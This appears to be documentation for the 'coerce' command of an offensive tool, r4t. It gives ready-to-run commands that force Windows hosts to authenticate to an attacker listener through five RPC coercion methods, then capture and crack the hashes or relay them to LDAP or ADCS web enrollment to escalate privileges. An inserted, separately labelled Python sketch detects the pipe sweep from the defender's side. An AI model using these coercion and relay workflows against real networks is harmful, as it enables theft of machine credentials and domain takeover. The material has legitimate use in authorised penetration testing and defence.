coerce
The coerce command performs authentication coercion attacks — forcing a remote machine to authenticate back to an attacker-controlled listener using various Windows RPC protocols. This is used to capture Net-NTLMv2 hashes or relay authentication to other services (e.g., LDAP, SMB, ADCS web enrollment).
Usage
r4t coerce <method> [target] [flags]
Common Flags
These flags are shared across all coercion methods:
| Flag | Short | Description |
|---|---|---|
| --listener | -L | Attacker listener IP or hostname (required) |
| --username | -u | Username for RPC authentication to target |
| --password | -p | Password for RPC authentication |
| --hash | -H | NT hash (LM:NT or just NT) |
| --domain | -d | Domain |
| --dc | — | Domain controller (optional; used for Kerberos ticket resolution) |
| --target-ip | — | Override target IP (SNI still uses the hostname) |
| --incremental | -i | Prompt before each named pipe attempt (default: true) |
| --threads | -t | Number of concurrent coercion threads (default: 1) |
Relay Flags
When --relay <host> is set, R4t starts a built-in relay server alongside the coercion attack and forwards captured authentication to the specified target. These flags are available on every method subcommand.
| Flag | Description |
|---|---|
| --relay <host> | Relay target host — enables the built-in relay server |
| --adcs | Relay type: SMB→HTTP(S) to Certificate Authority (ESC8) (default when no type is set) |
| --smb | Relay type: SMB→SMB (not yet implemented) |
| --ldap | Relay type: SMB→LDAP (not yet implemented) |
| --ldaps | Relay type: SMB→LDAPS (not yet implemented) |
| --shadow-credentials | Relay type: Shadow Credentials via LDAP (not yet implemented) |
| --mssql | Relay type: SMB→MSSQL (not yet implemented) |
ADCS Relay Options
These flags apply when using --adcs (or when no relay type is specified, since ADCS is the default).
| Flag | Description |
|---|---|
| --template <name> | Certificate template to request (required for ADCS relay) |
| --https | Use HTTPS when relaying to the CA (default: HTTP port 80) |
| --relay-port <port> | Override the port on the relay target (0 = protocol default) |
| --ca-name <name> | CA name — kept for CLI compatibility; ignored for certsrv web relay |
Shadow Credentials Relay Options
| Flag | Description |
|---|---|
| --shadow-target <account> | Account to inject shadow credentials into |
Subcommands
coerce petitpotam
Coerce authentication via MS-EFSRPC (Encrypting File System Remote Protocol). This is the most widely applicable coercion method.
r4t coerce petitpotam --listener 10.10.10.100 dc01.corp.example.com
# With specific credentials for the RPC call
r4t coerce petitpotam --listener 10.10.10.100 \
-u jsmith -p 'P@ssword1' -d corp.example.com \
dc01.corp.example.com
R4t tries each of these named pipes in sequence:
lsarpc
efsr
samr
lsass
netlogon
Use --incremental (default) to prompt before each pipe, allowing you to stop if authentication is captured.
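A defender-side view of the pipe sequence above, as an added example that is not part of the r4t documentation: it flags a single source that opens several of the listed pipes over IPC$ on one host within a short window. The record keys (time, host, ip, share, target) are assumed names for fields exported from Windows Security event 5145 (Detailed File Share auditing), and the sample events, window and threshold are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Named pipes this page lists for `coerce petitpotam`.
COERCION_PIPES = {"lsarpc", "efsr", "samr", "lsass", "netlogon"}
WINDOW = timedelta(seconds=60)  # assumption: tune per environment
MIN_DISTINCT_PIPES = 3          # assumption: a single pipe is normal traffic

# Constructed sample records; keys are assumed names for event 5145 fields.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "host": "dc01", "ip": "10.10.10.100", "share": r"\\*\IPC$", "target": "lsarpc"},
    {"time": "2024-05-01T10:00:03", "host": "dc01", "ip": "10.10.10.100", "share": r"\\*\IPC$", "target": "efsr"},
    {"time": "2024-05-01T10:00:05", "host": "dc01", "ip": "10.10.10.100", "share": r"\\*\IPC$", "target": "samr"},
    {"time": "2024-05-01T10:00:02", "host": "dc01", "ip": "10.10.20.5", "share": r"\\*\IPC$", "target": "samr"},
    {"time": "2024-05-01T10:30:00", "host": "dc01", "ip": "10.10.20.5", "share": r"\\*\IPC$", "target": "netlogon"},
    {"time": "2024-05-01T11:15:00", "host": "dc01", "ip": "10.10.20.5", "share": r"\\*\IPC$", "target": "lsarpc"},
    {"time": "2024-05-01T10:00:04", "host": "dc01", "ip": "10.10.20.9", "share": r"\\*\IPC$", "target": "samr"},
    {"time": "2024-05-01T10:00:06", "host": "fs01", "ip": "10.10.20.7", "share": r"\\*\C$", "target": r"reports\q1.xlsx"},
]

def pipe_sweeps(events, window=WINDOW, min_pipes=MIN_DISTINCT_PIPES):
    """Return sorted (host, source_ip, pipes) tuples where one source opened
    at least min_pipes distinct listed pipes on one host within window."""
    by_pair = defaultdict(list)
    for ev in events:
        pipe = ev["target"].lower().lstrip("\\")
        # Only named-pipe access over IPC$ to a listed pipe is of interest.
        if ev["share"].upper().endswith("IPC$") and pipe in COERCION_PIPES:
            when = datetime.fromisoformat(ev["time"])
            by_pair[(ev["host"], ev["ip"])].append((when, pipe))
    alerts = []
    for (host, ip), hits in by_pair.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans at most `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            pipes = {p for _, p in hits[start:end + 1]}
            if len(pipes) >= min_pipes:
                alerts.append((host, ip, tuple(sorted(pipes))))
                break  # one alert per (host, source) pair is enough
    return sorted(alerts)

if __name__ == "__main__":
    for alert in pipe_sweeps(SAMPLE_EVENTS):
        print(alert)
```

Domain members open samr, lsarpc and netlogon routinely, which is why the check keys on several distinct pipes from one source in a short window rather than on any single access.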
coerce dfscoerce
Coerce authentication via MS-DFSNM (Distributed File System Namespace Management Protocol).
r4t coerce dfscoerce --listener 10.10.10.100 dc01.corp.example.com
coerce mseven
Coerce authentication via MS-EVEN6 (Event Log Remoting Protocol Version 6).
r4t coerce mseven --listener 10.10.10.100 dc01.corp.example.com
coerce shadowcoerce
Coerce authentication via MS-FSRVP (File Server Remote VSS Protocol). Commonly referred to as ShadowCoerce.
r4t coerce shadowcoerce --listener 10.10.10.100 dc01.corp.example.com
coerce printerbug
Coerce authentication via MS-RPRN (Print System Remote Protocol). This is the original “PrinterBug” / SpoolSample method.
r4t coerce printerbug --listener 10.10.10.100 dc01.corp.example.com
coerce interactive
A split-panel interactive TUI that runs a listener on one side and coercion on the other simultaneously, giving real-time feedback on captured authentications.
TUI Controls
| Key | Action |
|---|---|
| Tab | Switch between the listener panel and coercion panel |
| Ctrl+K | Kill the listener |
| Ctrl+P | Pause / resume the listener |
| Ctrl+S | Show / hide password |
| q / Ctrl+C | Quit |
How Coercion Works
Authentication coercion exploits Windows RPC protocols that make outbound network calls using the machine account’s credentials. When you trigger one of these calls with a listener IP as the destination, the target machine authenticates to your listener.
Attacker (r4t coerce)        Target Machine               Attacker Listener
        │                          │                             │
        │── RPC Call (trigger) ──► │                             │
        │                          │── NTLM Auth (Net-NTLM) ──►  │
        │                          │                             │
                                                             Captured!
The captured authentication can be:
- Cracked offline (Net-NTLMv2 → password)
- Relayed to another service (LDAP, SMB, ADCS web enrollment)
Common Coercion Workflows
Capture and Crack
# Start Responder (external) to capture Net-NTLMv2
sudo responder -I eth0 -w
# Coerce the target
r4t coerce petitpotam --listener 10.10.10.100 dc01.corp.example.com
# Crack captured hash with hashcat
hashcat -m 5600 captured.hash wordlist.txt
Relay to LDAP (Privilege Escalation via RBCD)
# Start ntlmrelayx targeting LDAP (external)
ntlmrelayx.py -t ldap://dc01.corp.example.com --delegate-access
# Coerce a server to authenticate
r4t coerce petitpotam --listener 10.10.10.100 server01.corp.example.com
Relay to ADCS Web Enrollment (ESC8)
R4t has a built-in relay for ADCS — no external ntlmrelayx needed. --template is required.
# Coerce and relay in one command — relay server starts automatically
r4t coerce petitpotam --listener 10.10.10.100 \
--relay ca.corp.example.com --adcs --template Machine \
server01.corp.example.com
# Use HTTPS if the CA only serves over 443
r4t coerce petitpotam --listener 10.10.10.100 \
--relay ca.corp.example.com --adcs --template Machine --https \
server01.corp.example.com
# Use resulting PFX to extract NT hash
r4t adcs nt --pfx /tmp/server01.pfx
Coercible Host Discovery
Before coercing, identify which hosts are susceptible:
# LDAP scan stores coercible hosts in the database
r4t ldap scan
# View results
r4t dbquery "SELECT * FROM coercables"
Coercible Hosts Database
Hosts identified as potentially coercible are stored in the coercables table:
| Column | Description |
|---|---|
| Host | Hostname or IP |
| Method | Which RPC protocol is likely exploitable |
| Notes | Additional context |